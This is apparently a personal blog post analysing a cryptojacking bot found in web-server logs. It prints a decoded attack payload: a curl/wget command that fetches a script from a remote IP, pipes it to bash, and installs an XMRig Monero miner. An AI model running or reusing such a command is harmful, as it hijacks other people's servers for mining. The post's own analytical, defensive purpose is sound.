Connor Gadbois
About Blog Contact
Investigating A Monero Mining Script

March 18, 2025 | Connor Gadbois

Malware Analysis

    Recently I was looking through logs for this website when I noticed an interesting request.

    Bots will often look for WordPress plugins that can be exploited or common web server misconfigurations that expose data. However, this one is different, it's carrying a payload. On the surface it seems to be trying to exploit Apache Tomcat using a command injection vulnerability. Decoding the base 64 encoded payload we get:


    export HOME=/tmp; curl -s -L http://46.8.226.196/scripts/ .sh | bash -s; wget -qO-

    http://46.8.226.196/scripts/4thepool_miner.sh | bash -s


    The payload is meant to place this "4thepool_miner.sh" script into the /tmp folder and execute it.

    The script installs, configures, and runs XMRig, a Monero miner. Interestingly this isn't obfuscated at all, it looks like a script that someone would use to easily setup XMRig on their own system. All of the comments are still in the file, it is very verbose, and doesn't try to hide itself at all. Going to the web server hosting the script, it doesn't seem like any other scripts are being used. 

    Additionally, it doesn't seem that they have setup this Apache server beyond placing the scripts folder. The default page is still present and no steps have been taken to hide what this server is doing.

    All of this leads me to believe that this isn't a very advanced campaign. The server belongs to a Chinese cloud provider, meaning the attacker most likely found an exploit they put into a bot that would send it to every web server it could find. For the few servers it is able to successfully exploit and setup a miner on, they are not likely to be powerful enough to mine Monero quickly. The reason for the bot is to spread as wide a net as possible, they are hoping to get a handful of machines together to have enough compute power to make the campaign profitable.


    "4thepool" made me think that this might have been trying to donate compute to an XMR pool. However, the wallet being used doesn't seem to be a donation address to the pool that the script is using, or any other pool I could find. This script might have written with the intention of letting people donate to a XMR pool, but has been repurposed for profit.